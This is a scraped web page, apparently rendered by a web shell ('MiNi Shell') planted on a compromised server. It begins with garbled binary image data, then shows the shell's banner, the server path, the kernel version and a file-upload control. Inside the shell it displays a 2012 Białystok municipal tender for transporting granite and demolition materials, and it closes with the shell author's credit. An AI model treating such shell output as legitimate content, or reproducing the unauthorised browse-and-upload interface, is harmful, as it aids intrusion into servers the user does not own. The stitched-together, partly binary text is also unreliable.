JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/46702-N-2012.html

<p class="kh_header"><b>Białystok: Transport materiałów rozbiórkowych wraz z ich załadunkiem 
i wyładunkiem, ze składu przy ul. Św. Marka 14 w Sowlanach do składu przy ulicy W. Wysockiego 164 w Białymstoku</b><br>
<b>Numer ogłoszenia: 46702 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Transport materiałów rozbiórkowych wraz z ich załadunkiem 
i wyładunkiem, ze składu przy ul. Św. Marka 14 w Sowlanach do składu przy ulicy W. Wysockiego 164 w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Temat I 
Załadunek: kostki granitowej, elementów granitowych /krawężniki, oporniki, płyty granitowe 35x50x12cm/, kamienia polnego oraz połamanych płyt drogowych /69 szt./ na samochody ciężarowe samowyładowcze zapewnione przez wykonawcę tematu II, na placu składowym przy ul. Św. Marka 14 w Sowlanach.

1.2. Temat II
Przewiezienie: kostki granitowej, elementów granitowych /krawężniki, oporniki, płyty granitowe 35x50x12cm/, kamienia polnego oraz połamanych płyt drogowych /69 szt./, z jego wyładunkiem, ze składu przy ul. Św. Marka 14 w Sowlanach do składu przy ulicy W. Wysockiego 164 w Białymstoku/. Wykonawca zapewni samochody ciężarowe samowyładowcze w celu przewiezienia materiałów brukowych.

1.3. Szacunkowa ilość materiałów rozbiórkowych, których dotyczyć będzie załadunek i przewiezienie z wyładunkiem:
- materiały drobnowymiarowe /kostka granitowa, trylinka, kamień polny/  - 10 701 ton; 
- płytki granitowe - 176 ton;
- oporniki i krawężniki granitowe - 761 ton;
- połamane płyty drogowe - 220 ton;
2. Warunki realizacji zamówienia:

2.1. Wykonawcy zapewnią sprzęt niezbędny do wykonania przedmiotu zamówienia z pkt. 1.1. i 1.2. 

2.2. Wykonawca zobowiązuje się do zapewnienia przy realizacji prac odpowiedniego nadzoru technicznego oraz pracowników zgodnie z Ustawą z dnia 6 września 2001 r. /o transporcie drogowym/ i terminowego wykonania robót.  
2.3. Prace należy prowadzić w dni powszednie od poniedziałku do piątku w godzinach 7:00 - 15:00. Wykonawca w tym czasie zapewnia dyspozycyjność firmy na potrzeby Zamawiającego oraz stały kontakt telefoniczny.        
2.4. Załadunek należy prowadzić przy sprzyjających warunkach atmosferycznych /brak zalegającego śniegu na hałdach materiałów rozbiórkowych/.
2.5. Prace transportowe należy skoordynować z załadunkiem.

2.6. Zamawiający dokona odbioru prac przy udziale Wykonawcy :
a)	w terminie do 5 dni po realizacji tematu I -załadunek
b)	w terminie do 5 dni po realizacji tematu II - przewiezienia z wyładunkiem.
2.7. W celu dokonania odbioru prac Wykonawca obowiązany jest przedstawić następujące dokumenty: 
a)	Temat I: Wydanie Zewnętrzne /WZ/.
b)	Temat II: Wydanie Zewnętrzne /WZ/ i Przyjęcie Zewnętrzne /PZ/.
2.8. Podpisany przez Zamawiającego protokół odbioru prac jest podstawą do wystawienia faktury za wykonane zadania.
2.10.  Zamawiający jest uprawniony do kontroli realizacji zadania objętego umową.
2.9. Podstawą do stwierdzenia niewykonania lub nienależytego wykonania zadania objętego umową, stanowić będzie protokół z kontroli, sporządzony przez Zamawiającego z jednoczesnym powiadomieniem Wykonawcy o wynikach kontroli /faxem lub mailem/.
2.10. W stosunku od osób trzecich Wykonawca ponosi pełną odpowiedzialność za skutki i następstwa zdarzeń zależnych od nienależytego oraz nieterminowego wykonania prac.
2.11. Cena ofertowa powinna obejmować:
Temat I: 
a)	załadunek mechaniczny bądź ręczny materiałów  rozbiórkowych na  terenie składowiska przy ul. Św. Marka 14 w  Sowlanach,
Temat II: 
a)	transport materiałów rozbiórkowych na śr. odległość 9 km na składowisko przy ul. Wł. Wysockiego 164 w Białymstoku.
b)	rozładunek mechaniczny bądź ręczny materiałów  rozbiórkowych na terenie składowiska ul. Wł. Wysockiego 164 w Białymstoku
2.12. Prace objęte zakresem zamówienia będą rozliczane cenami jednostkowymi brutto. 
2.13.  Zamawiający planuje do realizacji przewiezienie 12 000 ton  materiałów rozbiórkowych. 
2.14. Zamawiający zastrzega sobie prawo do zmniejszenia ilości materiałów, których dotyczy zamówienie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  W przypadku  wykonawców  wspólnie ubiegających  się o udzielenie zamówienia:
a)  każdy  wykonawca  zobowiązany jest złożyć  oddzielnie  dokument określony w sekcji III.4.2) tiret 2, 
b) warunki dotyczące posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oraz sytuacji ekonomicznej i finansowej badane będą łącznie - oświadczenie o spełnianiu warunków udziału w postępowaniu, winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia;
c) oświadczenie  o spełnieniu warunków udziału w postępowaniu oraz oświadczenie o nie podleganiu wykluczeniu z postępowania składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku Zarząd Dróg i Inwestycji Miejskich ul. Składowa 11 , pok.222.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 09:00, miejsce: Urząd Miejski w Białymstoku Zarząd Dróg i Inwestycji Miejskich ul.Składowa 11 pok.204.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Załadunek: kostki granitowej, elementów granitowych /krawężniki, oporniki, płyty granitowe 35x50x12cm/, kamienia polnego oraz połamanych płyt drogowych /69 szt./ na samochody ciężarowe samowyładowcze zapewnione przez wykonawcę tematu II, na placu składowym przy ul. Św. Marka 14 w Sowlanach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1. Prace polegające na załadunku na samochody ciężarowe samowyładowcze /plac Sowlany, ul.Św.Marka 14/ kostki granitowej, elementów granitowych, kamienia polnego oraz połamanych płyt drogowych
2.2 .Szacowana ilość materiałów do przewiezienia: 12000 ton.
2.3.  Prace należy prowadzić w dni powszednie od poniedziałku do piątku w godzinach 7:00 - 15:00
2.4. Na czas realizacji zamówienia, Wykonawca zapewnia dyspozycyjność firmy na potrzeby Zamawiającego oraz stały kontakt telefoniczny w godz. 7:00 - 15:00. pod nr tel.
2.5.  Na czas obowiązywania umowy Wykonawca przyjmuje na siebie pełną odpowiedzialność w stosunku do osób trzecich, za skutki następstwa zdarzeń zależnych od nienależytego i nieterminowego wykonania umowy.
2.6. Załadunek należy prowadzić przy sprzyjających warunkach atmosferycznych /brak zalegającego śniegu na hałdach materiałów rozbiórkowych/. 
3. Warunki realizacji zamówienia 
3.1. Wykonawca powinien ściśle współpracować z firmą, która zostanie wyłoniona w ramach zapytania ofertowego  dotyczącego transportu materiałów. 
3.2. Prace związane z  załadunkiem należy skoordynować z transportem .
3.3.Zamawiający dokona odbioru prac przy udziale Wykonawcy, w terminie do 5 dni po zakończeniu, wykonywanego zadania.
3.4. W celu dokonania odbioru robót Wykonawca obowiązany jest przedstawić następujące dokumenty: Wydanie Zewnętrzne (WZ). 
3.5. Podpisany przez Zamawiającego protokół odbioru robót jest podstawą do wystawienia faktury za wykonane zadania.
3.6. Zamawiający jest uprawniony do kontroli realizacji zadania objętego umową.
3.7. Podstawą do stwierdzenia niewykonania lub nienależytego wykonania zadania objętego umową, stanowić będzie protokół z kontroli, sporządzony przez Zamawiającego z jednoczesnym powiadomieniem Wykonawcy o wynikach kontroli /faxem lub mailem/.
3.8. Zamawiający zastrzega sobie prawo do zmniejszenia zakresu robót objętych zamówieniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przewiezienie kostki granitowej, elementów granitowych /krawężniki, oporniki, płyty granitowe 35x50x12cm/, kamienia polnego oraz połamanych płyt drogowych /69 szt./, z jego wyładunkiem, ze składu przy ul. Św. Marka 14 w Sowlanach do składu przy ulicy  W. Wysockiego 164 w Białymstoku/. Wykonawca zapewni samochody ciężarowe samowyładowcze w celu przewiezienia materiałów brukowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1 Prace polegające na transporcie bez załadunku /plac Sowlany, ul. Św. Marka 14/: kostki granitowej, elementów granitowych, kamienia polnego oraz połamanych płyt drogowych na średnią odległość 9 km, rozładunek /na placu przy ul. W. Wysockiego 164  w Białymstoku/.
2.2 Szacowana ilość materiałów do przewiezienia: 12000  ton.
2.3  Prace należy prowadzić w dni powszednie od poniedziałku do piątku w godzinach 7:00 - 15:00
2.4 Na czas realizacji zamówienia, Wykonawca zapewnia dyspozycyjność firmy na potrzeby Zamawiającego oraz stały kontakt telefoniczny w godz. 7:00 - 15:00. pod nr tel
2.5  Na czas obowiązywania umowy Wykonawca przyjmuje na siebie pełną odpowiedzialność w stosunku do osób trzecich, za skutki następstwa zdarzeń zależnych od nienależytego i nieterminowego wykonania umowy. 
3. Warunki realizacji zamówienia 
3.1. Wykonawca powinien ściśle współpracować z firmą, która zostanie wyłoniona w ramach zapytania ofertowego  dotyczącego załadunku materiałów. 
3.2. Prace transportowe należy skoordynować z załadunkiem.
3.3 Zamawiający dokona odbioru prac przy udziale Wykonawcy, w terminie do 5 dni po zakończeniu, wykonywanego zadania.
3.4 Podpisany przez Zamawiającego protokół odbioru robót jest podstawą do wystawienia faktury za wykonane zadania.
3.5 Zamawiający jest uprawniony do kontroli realizacji zadania objętego umową.
3.6 Podstawą do stwierdzenia niewykonania lub nienależytego wykonania zadania objętego umową, stanowić będzie protokół z kontroli, sporządzony przez Zamawiającego z jednoczesnym powiadomieniem Wykonawcy o wynikach kontroli /faxem lub mailem/.
3.7 Zamawiający zastrzega sobie prawo do zmniejszenia zakresu robót objętych zamówieniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com